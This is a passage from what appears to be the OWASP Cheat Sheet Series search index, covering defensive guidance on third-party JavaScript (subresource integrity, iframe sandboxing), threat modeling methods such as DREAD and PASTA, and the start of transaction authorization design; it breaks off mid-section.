"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-requests","title":"Indirect Requests","text":"

For indirect requests to tag manager/aggregator sites that offer a GUI to configure the JavaScript, they may also implement:

The host company should also verify the security practices of the tag manager site, such as access controls to the tag configuration for the host company, which can also require two-factor authentication.

Letting the marketing folks decide where to get the data they want can result in XSS because they may get it from a URL parameter and put it into a variable that is in a scriptable location on the page.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-content","title":"Sandboxing Content","text":"

Both of these tools can be used by sites to sandbox/clean DOM data.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity","title":"Subresource Integrity","text":"

Subresource Integrity will ensure that only code that has been reviewed is executed. The developer generates integrity metadata for the vendor JavaScript and adds it to the script element like this:

<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"\nintegrity=\"sha384-MBO5IDfYaE6c6Aao94oZrIOiC7CGiSNE64QUbHNPhzk8Xhm0djE6QqTpL0HzTUxk\"\ncrossorigin=\"anonymous\">\n</script>\n

It is important to know that in order for SRI to work, the vendor host needs CORS enabled. It is also a good idea to monitor the vendor JavaScript for changes on a regular basis, because when the vendor updates the script, you can end up with secure but non-functioning third-party code.
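The integrity value is a base64-encoded digest (SHA-256, SHA-384 or SHA-512) of the exact file being served. One way to compute it, sketched with Node.js built-ins over a locally reviewed copy of the vendor script:

const crypto = require('crypto');
const fs = require('fs');

// Compute an SRI value for the reviewed copy of the vendor script
const fileContents = fs.readFileSync('script.js');   // the exact bytes the browser will receive
const digest = crypto.createHash('sha384').update(fileContents).digest('base64');
console.log(`sha384-${digest}`);                      // paste into the integrity attribute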

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#keeping-javascript-libraries-updated","title":"Keeping JavaScript libraries updated","text":"

OWASP Top 10 2013 A9 describes the problem of using components with known vulnerabilities. This includes JavaScript libraries. JavaScript libraries must be kept up to date, as previous versions can have known vulnerabilities which typically leave the site vulnerable to Cross-Site Scripting. There are several tools that can help identify such libraries. One such tool is the free open source tool RetireJS.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-with-iframe","title":"Sandboxing with iframe","text":"

You can also put vendor JavaScript into an iframe served from a different domain (e.g. a static data host). It will work as a \"jail\" and the vendor JavaScript will not have direct access to the host page DOM and cookies.

The host main page and sandbox iframe can communicate between each other via the postMessage mechanism.
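The sending side of that channel, from the host page into the sandboxed iframe, could look like the following sketch; note the explicit target origin, which prevents the data from being delivered to an unexpected document (the element id and data values are illustrative):

// Host page (somehost.com): pass only the data the vendor script needs into the iframe
const frame = document.getElementById('analytics-frame');
frame.addEventListener('load', () => {
  frame.contentWindow.postMessage(
    { page: 'checkout', step: 2 },
    'https://somehost-static.net'      // explicit target origin, never a wildcard
  );
});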

Also, iframes can be secured with the iframe sandbox attribute.

For high risk applications, consider the use of Content Security Policy (CSP) in addition to iframe sandboxing. CSP makes hardening against XSS even stronger.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0somehost.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Include\u00a0iframe\u00a0with\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<iframe\n       src=\"https://somehost-static.net/analytics.html\"\n       sandbox=\"allow-same-origin\u00a0allow-scripts\">\n       </iframe>\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n\n<!--\u00a0somehost-static.net/analytics.html\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>\nwindow.addEventListener(\"message\",\u00a0receiveMessage,\u00a0false);\nfunction\u00a0receiveMessage(event)\u00a0{\nif\u00a0(event.origin\u00a0!==\u00a0\"https://somehost.com:443\")\u00a0{\nreturn;\n}\u00a0else\u00a0{\n//\u00a0Make\u00a0some\u00a0DOM\u00a0here\u00a0and\u00a0initialize\u00a0other\n//data\u00a0required\u00a0for\u00a03rd\u00a0party\u00a0code\n}\n}\n</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#virtual-iframe-containment","title":"Virtual iframe Containment","text":"

This technique creates iFrames that run asynchronously in relation to the main page. It also provides its own containment JavaScript that automates the dynamic implementation of the protected iFrames based on the marketing tag requirements.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-agreements","title":"Vendor Agreements","text":"

You can have the agreement or request for proposal with the 3rd parties require evidence that they have implemented secure coding and general corporate server access security. In particular, you need to determine how their source code is monitored and controlled in order to prevent and detect malicious changes to that JavaScript.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#martechsec","title":"MarTechSec","text":"

Marketing Technology Security

This refers to all aspects of reducing the risk from marketing JavaScript. Controls include:

  1. Contractual controls for risk reduction; the contracts with any MarTech company should include a requirement to show evidence of code security and code integrity monitoring.
  2. Contractual controls for risk transference; the contracts with any MarTech company could include a penalty for serving malicious JavaScript.
  3. Technical controls for malicious JavaScript execution prevention; Virtual iframes.
  4. Technical controls for malicious JavaScript identification; Subresource Integrity.
  5. Technical controls such as including malicious client-side JavaScript behavior in penetration testing requirements.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#marsecops","title":"MarSecOps","text":"

Marketing Security Operations

This refers to the operational requirements needed to maintain some of the technical controls. It involves possible cooperation and information exchange between the marketing team, the MarTech provider and the run or operations team to update the information in the page controls (SRI hash changes, changes in pages with SRI), the policies in the Virtual iframes, tag manager configuration, data layer changes, etc.

The most complete and preventive controls for any site containing non-trivial marketing tags are:

  1. A data layer that calls the marketing server or tag manager APIs, so that only your code executes on your page (inversion of control).

  2. Subresource Integrity.

  3. Virtual iframe Containment.

The MarSecOps requirements to implement technical controls at the speed of change that marketing wants, or without a significant number of dedicated resources, can make data layer and Subresource Integrity controls impractical.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html","title":"Threat Modeling Cheat Sheet","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Threat modeling is a structured approach to identifying and prioritizing potential threats to a system, and determining the value that potential mitigations would have in reducing or neutralizing those threats. This cheat sheet aims to provide guidance on how to create threat models for both existing systems or applications and new systems.

You do not need to be a security expert in order to implement the techniques covered in this cheat sheet. All developers, software and system designers, and architects should strive to include threat modeling in their software development life cycle. Optimally, you will create your threat models and determine which mitigations are needed during an early stage of the development of a new system, application, or feature. Assessing potential threats during the design phase of your project can save significant resources that might be needed to refactor the project to include risk mitigations during a later phase of the project.

When you produce a threat model, you will:

Note that throughout the document, the terms \"systems\" and \"applications\" are used interchangeably. The principles in the document apply equally to designing and building systems such as network infrastructures or server clusters as they do to designing or developing desktop, mobile, or web applications.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#threat-modeling-terminology","title":"Threat Modeling Terminology","text":"

You should be familiar with the following terms that will be used throughout this cheat sheet.

A threat agent is an individual or group that is capable of carrying out a particular threat. It is fundamental to identify who would want to exploit the assets of a company, how they might use them against the company, and if they would be capable of doing so. Some threats require more expertise or resources, and thus raise the level of threat actor needed. For example, if a threat requires hundreds of thousands of dollars of computing power to implement, it is likely that only organized corporate, criminal, or government actors would be valid threat actors for such a threat. However, with the rise of cloud computing and the prevalence of attack software on the internet, other threats may be easy to implement with relatively little skill and few resources.

Impact is a measure of the potential damage caused by a particular threat. Impact and damage can take a variety of forms. A threat may result in damage to physical assets, or may result in obvious financial loss. Indirect loss may also result from an attack, and needs to be considered as part of the impact. For example, if your company's website were defaced this could cause damage to your company's reputation, which may in turn cause a loss of business because of the loss of confidence by your users. Depending on the business you are in, attacks that expose user information could potentially result in a physical threat of harm or loss of life to your users, greatly raising the impact of threats that would allow such exposure.

Likelihood is a measure of the possibility of a threat being carried out. A variety of factors can impact the likelihood of a threat being carried out, including how difficult the implementation of the threat is, and how rewarding it would be to the attacker. For example, if a threat required a skilled threat actor with tens of thousands of dollars of computing resources to implement, and the only reward was that they were able to gain access to information that is already public in some other form, the likelihood is low. However, if the threat is relatively easy to accomplish, or if the attacker were to gain valuable information from which they could profit, the likelihood may be higher.

Controls are safeguards or countermeasures that you put in place in order to avoid, detect, counteract, or minimize potential threats against your information, systems, or other assets.

Preventions are controls that may completely prevent a particular attack from being possible. For example, if you identify a threat that your users' personal information may be identified by certain application logging, and you decide to completely remove that logging, you have prevented that particular threat.

Mitigations are controls that are put in place to reduce either the likelihood or the impact of a threat, while not necessarily completely preventing it. For example, if you store your users' passwords as hashes in a database, two users who have the same password will have the same hash. Thus, if an attacker has access to the hashed passwords and is able to determine the password associated with one hash, he is easily able to find all the other users who share the same password simply by looking for the same hash. However, if you add salts to each user's password, the cost of this particular attack is greatly increased, as the attacker must crack each password individually. An increase in cost reduces the likelihood, and thus has mitigated the attack.
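
As a rough illustration of this point, the following Python sketch shows that identical passwords produce identical unsalted hashes, but differ once a per-user random salt is added; SHA-256 is used only to keep the example short, and a dedicated password hashing function such as Argon2 or bcrypt should be used in practice:

import hashlib
import os

password = b"correct horse battery staple"

# Without a salt, two users with the same password share the same stored hash.
print(hashlib.sha256(password).hexdigest())
print(hashlib.sha256(password).hexdigest())

# With a per-user salt, the stored hashes differ, so cracking one hash no
# longer reveals every user who chose the same password.
for _ in range(2):
    salt = os.urandom(16)
    print(salt.hex(), hashlib.sha256(salt + password).hexdigest())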

A data flow diagram is a depiction of how information flows through your system. It shows each place that data is input into or output from each process or subsystem. It includes anywhere that data is stored in the system, either temporarily or long-term.

A trust boundary (in the context of threat modeling) is a location on the data flow diagram where data changes its level of trust. Any place where data is passed between two processes is typically a trust boundary. If your application reads a file from disk, there's a trust boundary between the application and the file because outside processes and users can modify the data in the file. If your application makes a call to a remote process, or a remote process makes calls to your application, that's a trust boundary. If you read data from a database, there's typically a trust boundary because other processes can modify the data in the database. Any place you accept user input in any form is always a trust boundary.

In addition to the above terminology, it is important to be familiar with the key threat modeling principles defined in the Threat Modeling Manifesto project. Those principles are considered throughout the following steps in this cheat sheet.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#getting-started","title":"Getting Started","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-business-objectives","title":"Define Business Objectives","text":"

Before starting the threat modeling process it is important to identify business objectives of the applications you are assessing, and to identify security and compliance requirements that may be necessary due to business or government regulation. Having these objectives and requirements in mind before the threat assessment begins will help you to evaluate the impact of any threat you find during the risk analysis process.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-application-design","title":"Identify application design","text":"

Early in the threat modeling process, you will need to draw a data flow diagram of the entire system that is being assessed, including its trust boundaries. Thus, understanding the design of the application is key to performing threat modeling. Even if you are very familiar with the application design, you may identify additional data flows and trust boundaries throughout the threat modeling process.

A thorough understanding of how the system is designed will also help you assess the likelihood and potential impact of any particular threat that you identify.

When you are assessing an existing system that has existing design documentation, spend time reviewing that documentation. The documentation may be out of date, requiring you to gather new information to update it. Or there may be no documentation at all, requiring you to create the design documents.

In the optimal case, you are performing your assessment during the design phase of the project, and the design documentation will be up-to-date and available. In any event, this cheat sheet outlines steps you can take to create design documents if they are needed.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-design-documents","title":"Create design documents","text":"

There are many ways to generate design documents; the 4+1 view model is one of the more mature approaches to building your design document.

Reference to 4+1 view model of architecture here.

Please note that while the 4+1 view model is comprehensive, you may use any other design model during this phase.

The following subsections show the details of the 4+1 approach and how it can help in the threat modeling process:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#logical-view","title":"Logical View","text":"

Create a logical map of the Target of Evaluation.

Audience: Designers.

Area: Functional Requirements: describes the design's object model.

Related Artifacts: Design model

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#implementation-view","title":"Implementation View","text":"

Audience: Programmers.

Area: Software components: describes the layers and subsystems of the application.

Related Artifacts: Implementation model, components

Please refer to the image in the appendix section for sample design for the implementation view.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#process-view","title":"Process View","text":"

Audience: Integrators.

Area: Non-functional requirements: describes the design's concurrency and synchronization aspects.

Related Artifacts: (no specific artifact).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#deployment-view","title":"Deployment View","text":"

Create a physical map of the Target of Evaluation

Audience: Deployment managers.

Area: Topology: describes the mapping of the software onto the hardware and shows the system's distributed aspects.

Related Artifacts: Deployment model.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-case-view","title":"Use-Case View","text":"

Audience: All the stakeholders of the system, including the end users.

Area: describes the set of scenarios and/or use cases that represent some significant, central functionality of the system.

Related Artifacts: Use-Case Model, Use-Case documents

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#decompose-and-model-the-system","title":"Decompose and Model the System","text":"

To perform a threat model, it is important to understand how the system works and how it interacts with its ecosystem. Start by creating a high-level information flow diagram, as follows:

  1. Identify the trusted boundaries of your system/application/module/ecosystem that you may want to start off with.
  2. Add actors, both internal and external.
  3. Define internal trusted boundaries. These can be the different security zones that have been designed.
  4. Review the actors you identified in step 2 for consistency.
  5. Add information flows.
  6. Identify the information elements and their classification as per your information classification policy.
  7. Where possible, add assets to the identified information flows.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-and-evaluate-your-assets","title":"Define and Evaluate your Assets","text":"

Assets involved in the information flow should be defined and evaluated according to their confidentiality, integrity and availability value.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#consider-data-in-transit-and-data-at-rest","title":"Consider Data in transit and Data at rest","text":"

Data protection in transit is the protection of data while it is travelling from network to network or being transferred from a local storage device to a cloud storage device. Wherever data is moving, effective data protection measures for in-transit data are critical, as data is often considered less secure while in motion.

While data at rest is sometimes considered to be less vulnerable than data in transit, attackers often find data at rest a more valuable target than data in motion.

The risk profile for data in transit or data at rest depends on the security measures that are in place to secure data in either state. Protecting sensitive data both in transit and at rest is imperative for modern enterprises as attackers find increasingly innovative ways to compromise systems and steal data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-an-information-flow-diagram","title":"Create an information flow diagram","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#whiteboard-your-architecture","title":"Whiteboard Your Architecture","text":"

It is important to whiteboard the system architecture by showing the major constraints and decisions in order to frame and start conversations. The value is actually twofold: if the architecture cannot be whiteboarded, then it is not well understood; if a clear and concise whiteboard diagram can be provided, others will understand it and it will be easier to communicate details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#manage-to-present-your-dfd-in-the-context-of-mvc","title":"Manage to present your DFD in the context of MVC","text":"

In this step, the Data Flow Diagram should be divided in the context of Model, View, Controller (MVC).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-tools-to-draw-your-diagram","title":"Use tools to draw your diagram","text":"

If you don't want to manually draw your DFD, there are several tools available that can be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-threat-dragon","title":"OWASP Threat Dragon","text":"

The OWASP Threat Dragon project is a cross platform tool that runs on Linux, macOS and Windows 10. Threat Dragon (TD) is used to create threat model diagrams and to record possible threats and decide on their mitigations using STRIDE methodology. TD is both a web application and a desktop application; refer to the project's GitHub repository for the latest release.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#poirot","title":"Poirot","text":"

The Poirot tool isolates and diagnoses defects through fault modeling and simulation. Along with a carefully selected partitioning strategy, functional and sequential test pattern applications show success with circuits having a high degree of observability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#ms-tmt","title":"MS TMT","text":"

The Microsoft Threat Modeling Tool (TMT) helps find threats in the design phase of software projects. It is one of the longest lived threat modeling tools, having been introduced as Microsoft SDL in 2008, and is actively supported; version 7.3 was released March 2020. It runs only on Windows 10 Anniversary Update or later, and so is difficult to use on macOS or Linux.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-pytm","title":"OWASP pytm","text":"

Pytm is a Python library that helps you describe your system in terms of objects and attributes; it can generate a DFD in Graphviz (dot) format, a sequence diagram in PlantUML format, and a list of threats (from CAPEC and other threat libraries) to the system in a templated format. As of 2023 it is under active development. No Python knowledge is necessary for its use: if you can define objects and use .attribute notation, you should be able to use it.
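
As a minimal sketch of how such a model might look (class and attribute names are taken from the pytm project documentation and may change between releases):

from pytm import TM, Actor, Boundary, Dataflow, Server

tm = TM("Sample web application")
tm.description = "High-level model used to generate a DFD and a threat list"

internet = Boundary("Internet")

user = Actor("User")
user.inBoundary = internet

web = Server("Web Server")

# Dataflows between elements are what pytm uses to draw the DFD and to match
# threats from its threat library.
Dataflow(user, web, "User issues HTTPS request")
Dataflow(web, user, "Web server returns response")

if __name__ == "__main__":
    tm.process()  # run the script with --dfd, --seq or --report to get output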

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-data-flow-over-your-dfd","title":"Define Data Flow over your DFD","text":"

Define data flows over the organization's Data Flow Diagram.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-trust-boundaries","title":"Define Trust Boundaries","text":"

Define any distinct boundaries (External boundaries and Internal boundaries) within which a system trusts all sub-systems (including data).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-applications-user-roles-and-trust-levels","title":"Define applications user roles and trust levels","text":"

Define access rights that the application will grant to external entities and internal entities.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#highlight-authorization-per-user-role-over-the-dfd","title":"Highlight Authorization per user role over the DFD","text":"

Highlight authorization per user role, for example defining the app user role, the admin role, the anonymous visitor role, etc.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-application-entry-points","title":"Define Application Entry points","text":"

Define the interfaces through which potential attackers can interact with the application or supply it with data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-threat-agents","title":"Identify Threat Agents","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-all-possible-threats","title":"Define all possible threats","text":"

Identify possible attackers (threat agents) that could exist within the Target of Evaluation. Use means, motive, and opportunity to understand the threats posed by attackers. Then associate threat agents with the system components they can directly interact with.

Work on minimizing the number of threat agents by:

The user of this cheat sheet can depend on the following list of risk and threat library sources to define the possible threats an application might be facing:

  1. Risks with OWASP Top 10.
  2. Testing Procedure with OWASP ASVS.
  3. Risks with SANS Top 25.
  4. Microsoft STRIDE.
  5. Continuous Threat Modeling CTM.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#map-threat-agents-to-application-entry-points","title":"Map Threat agents to application Entry points","text":"

Map threat agents to the application entry points, whether it is a login process, a registration process or whatever it might be, and consider insider threats.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#draw-attack-vectors-and-attacks-tree","title":"Draw attack vectors and attacks tree","text":"

During this phase conduct the following activities:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#mapping-abuse-cases-to-use-cases","title":"Mapping Abuse Cases to Use Cases","text":"

This is a very important step that can help identify application logical threats. A list of all possible abuse cases should be developed for each application use case. Being familiar with the types of application logical attacks is important during the mapping process. You can refer to OWASP Testing Guide 4.0: Business Logic Testing and OWASP ASVS for more details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#re-define-attack-vectors","title":"Re-Define attack vectors","text":"

In most cases, after defining the attack vectors, a compromised user role could lead to further attacks against the application. For example, assuming that an internet banking user's credentials could be compromised, the user of this cheat sheet then has to redefine the attack vectors that could result from compromising those credentials, and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#write-your-threat-traceability-matrix","title":"Write your Threat traceability matrix","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-the-impact-and-probability-for-each-threat","title":"Define the Impact and Probability for each threat","text":"

Enumerate Attacks posed by the most dangerous attacker in designated areas of the logical and physical maps of the target of evaluation.

Assume the attacker has a zero-day, because he does. In this methodology we assume compromise, because a zero-day will exist or already does exist (even if we don't know about it). This is about what can be done by skilled attackers with much more time, money, motive and opportunity than we have.

Use a risk management methodology to determine the risk behind the threat.

Create risks in the risk log for every identified threat or attack against any asset. A risk assessment methodology is followed in order to identify the risk level for each vulnerability, and hence for each server.

Here we will highlight two risk methodologies that can be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#dread","title":"DREAD","text":"

DREAD is about evaluating each existing vulnerability using a mathematical formula to derive the vulnerability's corresponding risk. The DREAD formula is divided into 5 main categories:

The DREAD formula is:

Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability).

Then the risk level is determined using defined thresholds below.
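
As a small worked example, the following Python sketch applies the formula above; the category scores (0-10) and any risk-level thresholds are illustrative assumptions rather than values defined by this cheat sheet:

def dread_risk(damage, reproducibility, exploitability, affected_users, discoverability):
    # Risk Value = (Damage + Affected users) x (Reproducibility + Exploitability + Discoverability)
    return (damage + affected_users) * (reproducibility + exploitability + discoverability)

# Example scoring for a hypothetical vulnerability.
risk_value = dread_risk(damage=8, reproducibility=9, exploitability=7,
                        affected_users=8, discoverability=10)
print(risk_value)  # 416 with these example scores; compare against your thresholds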

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#pasta","title":"PASTA","text":"

PASTA (Process for Attack Simulation and Threat Analysis) is a complete methodology to perform application threat modeling. PASTA introduces a risk-centric methodology aimed at applying security countermeasures that are commensurate with the possible impact that could be sustained from defined threat models, vulnerabilities, weaknesses, and attack patterns.

PASTA introduces complete risk analysis and evaluation procedures that you can follow to evaluate the risk for each of the identified threats. The main difference when using the PASTA approach is that you evaluate the impact early on in the analysis phase, instead of addressing the impact at the step of evaluating the risk.

The idea behind addressing the impact earlier in the PASTA approach is that the audience that knows the impact understands the consequences of product or use case failures better than the participants in the threat analysis phase.

Application security risk assessments are not enough because they are very binary and leverage a control framework basis for denoting risks. It is recommended to contextually look at threats impacts, probability and effectiveness of countermeasures that may be present.

R = (TVP*I) / Countermeasures

For more details about PASTA.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#rank-risks","title":"Rank Risks","text":"

Using a risk matrix, rank risks from most severe to least severe based on means, motive and opportunity. Below is a sample risk matrix table; depending on your risk approach, you can define a different risk ranking matrix:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#determine-countermeasures-and-mitigation","title":"Determine countermeasures and mitigation","text":"

Identify risk owners and agree on risk mitigation with the risk owners and stakeholders. Provide the needed controls in the form of code upgrades and configuration updates to reduce risks to acceptable levels.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-risk-owners","title":"Identify risk owners","text":"

For the assessors: after defining and analyzing the risks, the assessor should work on the mitigation plan by first identifying the risk owners, i.e. the personnel responsible for mitigating the risk (for example, someone from the information security team or the development team).

For the designers or the architects: they should assign the risk mitigation to the development team so that it is considered while building the application.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#agree-on-risk-mitigation-with-risk-owners-and-stakeholders","title":"Agree on risk mitigation with risk owners and stakeholders","text":"

After identifying the risk owners, it is important to review the mitigation controls for each of the identified risks. Some controls might be inapplicable; in that case you should propose other mitigation controls, or discuss possible compensating controls with the risk owners.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#build-your-risk-treatment-strategy","title":"Build your risk treatment strategy","text":"

For the assessor, this is considered the last step in the assessment process. The following steps should be conducted by the risk owner; however, the assessor shall engage in 6.5 (Testing risk treatment) to verify the remediation.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#select-appropriate-controls-to-mitigate-the-risk","title":"Select appropriate controls to mitigate the risk","text":"

Select one of the controls to reduce the risk, for example by upgrading the code, building a specific configuration during the deployment phase, and so on.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#test-risk-treatment-to-verify-remediation","title":"Test risk treatment to verify remediation","text":"

Mitigation controls will not eliminate the risk completely; rather, they will just reduce the risk. In this case, the user of this cheat sheet should measure the value of the risk after applying the mitigation controls. The value of the risk should be reduced to meet the acceptance criteria set earlier.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#reduce-risk-in-risk-log-for-verified-treated-risk","title":"Reduce risk in risk log for verified treated risk","text":"

After applying the mitigation and measuring the new risk value, the user of this cheat sheet should update the risk log to verify that the risk has been reduced.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#periodically-retest-risk","title":"Periodically retest risk","text":"

Application threat modeling is an ongoing process. In addition to changes to the application that may require re-evaluating the expected threats, it is also important to periodically retest the identified risks and the implemented risk treatments.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#appendix","title":"Appendix","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html","title":"Transaction Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#purpose-and-audience","title":"Purpose and audience","text":"

The purpose of this cheat sheet is to provide guidelines on how to securely implement transaction authorization to protect it from being bypassed. These guidelines can be used by:

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Some applications use a second factor to check whether an authorized user is performing sensitive operations. A common example is wire transfer authorization, typically used in online or mobile banking applications.

For the purpose of this document we will call that process: transaction authorization.

Usage scenarios are not limited to financial systems. For example: an email with a secret code or a link with some kind of token to unlock a user account is also a special case of transaction authorization. A user authorizes the operation of account unlocking by using a second factor (a unique code sent to his email address). Transaction authorization can be implemented using various methods, e.g.:

Some of these can be implemented on a physical device or in a mobile application.

Transaction authorization is implemented in order to protect against unauthorized wire transfers resulting from attacks using malware, phishing, password or session hijacking, CSRF, XSS, etc. Unfortunately, as with any piece of code, this protection can be improperly implemented and as a result it might be possible to bypass this safeguard.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#1-functional-guidelines","title":"1. Functional Guidelines","text":""},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#11-transaction-authorization-method-has-to-allow-a-user-to-identify-and-acknowledge-significant-transaction-data","title":"1.1 Transaction authorization method has to allow a user to identify and acknowledge significant transaction data","text":"

Users' computers cannot be trusted due to malware threats. Hence a method that does not allow a user to identify the transaction on an external device cannot be considered secure. Transaction data should be presented and acknowledged using an external authorization component.

Such transaction authorization components should be built using the What You See Is What You Sign principle. When a user authorizes a transaction they need to know what they are authorizing. Based on this principle, an authorization method must permit a user to identify and acknowledge the data that is significant to a given transaction. For example, in the case of a wire transfer: the target account and amount.

The decision about which transaction data can be considered as significant should be chosen based on:

For example, when an SMS message is used to send significant transaction data, it is possible to send the target account, amount and type of transfer. However, for an unconnected CAP reader it is inconvenient for a user to enter this data. In such cases, entering only the most significant transaction data (e.g. partial target account number and amount) can be considered sufficient.

In general, significant transaction data should always be presented as an inherent part of the transaction authorization process, and the user experience should be designed to encourage users to verify the transaction data.

If a transaction process requires a user to enter transaction data into an external device, the user should be prompted to provide a specific value (e.g. a target account number). Entering a value without a meaningful prompt could easily be abused by malware using social engineering techniques, as described in the example in paragraph 1.4. Also, for a more detailed discussion of input overloading problems, see here.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#12-change-of-authorization-token-should-be-authorized-using-the-current-authorization-token","title":"1.2 Change of authorization token should be authorized using the current authorization token","text":"

When a user is allowed to change the authorization token using the application interface, the operation should be authorized using his current authorization credentials (as is the case with a password change procedure). For example: when a user changes the phone number used for SMS codes, an authorization SMS code should be sent to the current phone number.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#13-change-of-authorization-method-should-be-authorized-using-the-current-authorization-method","title":"1.3 Change of authorization method should be authorized using the current authorization method","text":"

Some applications allow a user to choose between multiple methods of transaction authorization. In such cases, the user should authorize the change of authorization method using his current authorization method. Otherwise, malware may change the authorization method to the most vulnerable one.

Additionally, the application should inform the user about the potential dangers associated with the selected authorization method.

"},{"location":"cheatsheets/Transaction_Authorization_Cheat_Sheet.html#14-users-should-be-able-to-easily-distinguish-the-authentication-process-from-the-transaction-authorization-process","title":"1.4 Users should be able to easily distinguish the authentication process from the transaction authorization process","text":"

Malware can trick users into authorizing fraudulent operations when an application requires a user to perform the same actions for authentication as for transaction authorization. Consider the following example:

